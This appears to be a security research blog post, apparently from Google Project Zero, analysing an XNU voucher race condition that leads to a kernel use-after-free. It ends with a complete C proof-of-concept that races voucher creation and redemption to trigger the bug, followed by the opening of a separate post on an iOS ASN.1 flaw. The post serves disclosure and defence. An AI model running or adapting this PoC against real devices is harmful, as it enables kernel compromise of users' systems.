The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

        mach_voucher_attr_value_reference_t     e_made;

        mach_voucher_attr_content_size_t        e_size;

        iv_index_t                              e_sum;

        iv_index_t                              e_hash;

        queue_chain_t                           e_hash_link;

        uint8_t                                 e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well, technically there's also nothing stopping it overflowing, so it can also go down 1 in every 2^32 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

        /* TODO: value insertion from returned voucher */

        if (IV_NULL != new_value_voucher) {

                iv_release(new_value_voucher);

        }

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

        /*

         * Find or create a slot in the table associated

         * with this attribute value.  The ivac reference

         * is transferred to a new value, or consumed if

         * we find a matching existing value.

         */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

        iv_set(voucher, key_index, val_index);

/*

 * Look up the values for a given <key, index> pair.

 *

 * Consumes a reference on the passed voucher control.

 * Either it is donated to a newly-created value cache

 * or it is released (if we piggy back on an existing

 * value cache entry).

 */

static iv_index_t

ivace_reference_by_value(

        ipc_voucher_attr_control_t      ivac,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_flags_t          flag)

{

        ivac_entry_t ivace = IVACE_NULL;

        iv_index_t hash_index;

        iv_index_t index;

        if (IVAC_NULL == ivac) {

                return IV_UNUSED_VALINDEX;

        }

        ivac_lock(ivac);

restart:

        hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

        index = ivac->ivac_table[hash_index].ivace_index;

        while (index != IV_HASH_END) {

                assert(index < ivac->ivac_table_size);

                ivace = &ivac->ivac_table[index];

                assert(!ivace->ivace_free);

                if (ivace->ivace_value == value) {

                        break;

                }

                assert(ivace->ivace_next != index);

                index = ivace->ivace_next;

        }

        /* found it? */

        if (index != IV_HASH_END) {

                /* only add reference on non-persistent value */

                if (!ivace->ivace_persist) {

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

                }

                ivac_unlock(ivac);

                ivac_release(ivac);

                return index;

        }

        /* insert new entry in the table */

        index = ivac->ivac_freelist;

        if (IV_FREELIST_END == index) {

                /* freelist empty */

                ivac_grow_table(ivac);

                goto restart;

        }

        /* take the entry off the freelist */

        ivace = &ivac->ivac_table[index];

        ivac->ivac_freelist = ivace->ivace_next;

        /* initialize the new entry */

        ivace->ivace_value = value;

        ivace->ivace_refs = 1;

        ivace->ivace_made = 1;

        ivace->ivace_free = FALSE;

        ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

        /* insert the new entry in the proper hash chain */

        ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

        ivac->ivac_table[hash_index].ivace_index = index;

        ivac_unlock(ivac);

        /* donated passed in ivac reference to new entry */

        return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

        iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

    iv_index_t key_index,

    iv_index_t value_index)

{

        assert(key_index < iv->iv_table_size);

        iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

        if (KERN_SUCCESS == kr) {

                *new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)
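
As a hedged illustration of this last level of deduplication (and an untested assumption on my part), creating two vouchers from identical recipes should hand back send rights to the same voucher port, and therefore the same name in the caller's port namespace:

#include <assert.h>
#include <mach/mach.h>

/* hypothetical helper from the earlier sketch */
extern kern_return_t create_udata_voucher(mach_port_t *voucher_out);

void
check_voucher_port_dedup(void)
{
  mach_port_t v1 = MACH_PORT_NULL;
  mach_port_t v2 = MACH_PORT_NULL;
  create_udata_voucher(&v1);
  create_udata_voucher(&v2);
  /* both send rights should name the single port for this voucher */
  assert(v1 == v2);
}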

Destruction

Although I did briefly hint at a vulnerability above, we still haven't actually seen enough code to determine whether that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

  ip_kobject = reference-counted pointer to the voucher

}

voucher {

  iv_refs = 1;

  iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

  ivace_table[index] =

    {

      ivace_refs = 1;

      ivace_made = 1;

      ivace_value = pointer to user_data_value_element

    }

}

user_data_value_element {

  e_made = 1;

  e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated, iv_release will get called to drop its reference on the voucher. And if that was the last reference, iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

        for (i = 0; i < iv->iv_table_size; i++) {

                ivace_release(i, iv->iv_table[i]);

        }

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

        iv_index_t key_index,

        iv_index_t value_index)

{

...

        ivgt_lookup(key_index, FALSE, &ivam, &ivac);

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(0 < ivace->ivace_refs);

        /* cant release persistent values */

        if (ivace->ivace_persist) {

                ivac_unlock(ivac);

                return;

        }

        if (0 < --ivace->ivace_refs) {

                ivac_unlock(ivac);

                return;

        }

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock, then calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

        key = iv_index_to_key(key_index);

        assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

        /*

         * if last return reply is still pending,

         * let it handle this later return when

         * the previous reply comes in.

         */

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

        /* claim releasing */

        ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

        value = ivace->ivace_value;

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute manager's release_value callback is called:

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

        ipc_voucher_attr_manager_t              __assert_only manager,

        mach_voucher_attr_key_t                 __assert_only key,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_reference_t     sync)

{

        user_data_element_t elem;

        iv_index_t hash;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        elem = (user_data_element_t)value;

        hash = elem->e_hash;

        user_data_lock();

        if (sync == elem->e_made) {

                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

                user_data_unlock();

                kfree(elem, sizeof(*elem) + elem->e_size);

                return KERN_SUCCESS;

        }

        assert(sync < elem->e_made);

        user_data_unlock();

        return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_release_value let's look back at the callsite:

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_replace_voucher_value where the user_data_value_element and ivace are actually allocated:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_replace_voucher_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that), and ivace_reference_by_value, which increments ivace->ivace_made, does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element, then we'll encounter one of the more complex situations outlined above where, in ivace_release, ivace_made is not equal to the user_data_value_element's e_made field. The reason that case gets special treatment is that it indicates that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.
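
To illustrate (this timeline is my annotation, not XNU code or comments), the interleaving being defended against looks something like this:

/*
 * Thread B (ipc_replace_voucher_value)   Thread A (ivace_release)
 * ------------------------------------   --------------------------------
 * ivam_get_value():
 *   e_made++ (user_data lock held)
 * [WINDOW: e_made > ivace_made]
 *                                        ivace_refs-- -> 0
 *                                        made = ivace_made
 *                                        ivam_release_value(.., made):
 *                                          sync != e_made -> KERN_FAILURE
 *                                          (element is NOT freed)
 * ivace_reference_by_value():
 *   ivace_refs++, ivace_made++
 */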

With this insight we can start to unravel the "redrive" logic:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

                if (KERN_SUCCESS != kr) {

                        ivace->ivace_releasing = FALSE;

                        ivac_unlock(ivac);

                        return;

                }

        }

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refcount has gone to zero, this thread hasn't yet removed it from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is nevertheless semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE, the racing thread, after decrementing ivace_refs back to zero, encountered this:

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken are nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment is explaining exactly what happens when the racing thread is in the region marked WINDOW above: after it has incremented e_made on the same user_data_value_element which this ivace points to via its ivace_value field, but before it has looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away, that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.
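
As a standalone demonstration of this class of bug (nothing voucher-specific here; all names are my own), two threads performing an unlocked increment will reliably lose updates:

#include <pthread.h>
#include <stdio.h>

static volatile unsigned made = 0;  /* stands in for e_made */

static void *
incrementer(void *arg)
{
  for (int i = 0; i < 1000000; i++) {
    made++;  /* unlocked read-modify-write, just like the REDEEM case */
  }
  return NULL;
}

int
main(void)
{
  pthread_t a, b;
  pthread_create(&a, NULL, incrementer, NULL);
  pthread_create(&b, NULL, incrementer, NULL);
  pthread_join(a, NULL);
  pthread_join(b, NULL);
  /* almost always prints a value less than 2000000 */
  printf("made = %u (expected 2000000)\n", made);
  return 0;
}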

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, thread A doesn't free the new_value which is live on thread B's stack:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.
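The release side is where that equality check lives. Here's a sketch of the shape of xnu's user_data_release_value (paraphrased from memory, not a verbatim quote; sync is the ivace_made count passed down when the last ivace reference is dropped):

static kern_return_t
user_data_release_value(..., mach_voucher_attr_value_handle_t value,
                        mach_voucher_attr_value_reference_t sync)
{
    user_data_element_t elem = (user_data_element_t)value;

    user_data_lock();
    if (sync == elem->e_made) {
        /* counts match: no thread can be in the WINDOW, really free it */
        queue_remove(...);
        user_data_unlock();
        kfree(elem, ...);
        return KERN_SUCCESS;
    }
    /* e_made > sync: some other thread is (re)using this element */
    elem->e_made -= sync;
    user_data_unlock();
    return KERN_FAILURE;
}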

So how can we make something bad happen? Well, let's assume that we successfully trigger the non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! Suppose that, in this corrupted steady state, we race two threads: thread A, which is dropping the last ivace_ref, and thread B, which is attempting to revive the ivace and is currently inside the WINDOW shown above. Thread B increments e_made before ivace_made, as always, but because e_made started out one lower than ivace_made (thanks to the earlier successful trigger of the non-atomic increment) e_made is now exactly equal to ivace_made. That is the exact condition which indicates we cannot possibly be in the WINDOW shown above, so thread A concludes that it's safe to free the user_data_value_element, which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. It would have been a marathon auditing effort to find it and to determine that it was exploitable. On the other hand, this attack surface is reachable from every sandbox, making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.
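For userspace code at least, trying this is cheap, since TSan is built into clang; e.g. a hypothetical harness exercising the racing code paths could be built with:

$ clang -fsanitize=thread -g harness.c -o harness

Instrumenting a kernel attack surface like this one would be a much bigger project.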

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to make sure that we invest even more effort in all of these possibilities, and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

    mach_port_t voucher = MACH_PORT_NULL;

    kern_return_t kr = host_create_mach_voucher(

            mach_host_self(),

            (mach_voucher_attr_raw_recipe_array_t)recipe,

            recipe_size,

            &voucher);

    if (kr != KERN_SUCCESS) {

        printf("failed to create voucher from recipe\n");

    }

    return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    *template_size_out = recipe_size;

    return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

    size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

    mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

    recipe->content_size = len;

   

    uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

    memcpy(content_buf, buf, len);

    mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

    recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

    recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

    *template_size_out = recipe_size;

    return recipe;

}

struct recipe_template_meta {

    void* recipe;

    size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

    struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

    for (int i = 0; i < iter_limit; i++) {

        mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

        mach_port_deallocate(mach_task_self(), voucher_port);

    }

    return NULL;

}

void sploit_3() {

    while(1) {

        // choose a userdata size:

        uint32_t userdata_size = (arc4random() % 2040)+8;

        userdata_size += 7;

        userdata_size &= (~7);

        printf("userdata size: 0x%x\n", userdata_size);

        uint8_t* userdata_buffer = calloc(userdata_size, 1);

        ((uint32_t*)userdata_buffer)[0] = arc4random();

        ((uint32_t*)userdata_buffer)[1] = arc4random();

        // build the templates:

        single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

        redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

        free(userdata_buffer);

        pthread_t single_recipe_thread;

        pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

        pthread_t redeem_recipe_thread;

        pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

        pthread_join(single_recipe_thread, NULL);

        pthread_join(redeem_recipe_thread, NULL);

        free(single_recipe_template.recipe);

        free(redeem_recipe_template.recipe);

    }

}

int main(int argc, char** argv) {

    sploit_3();

}

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as a quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

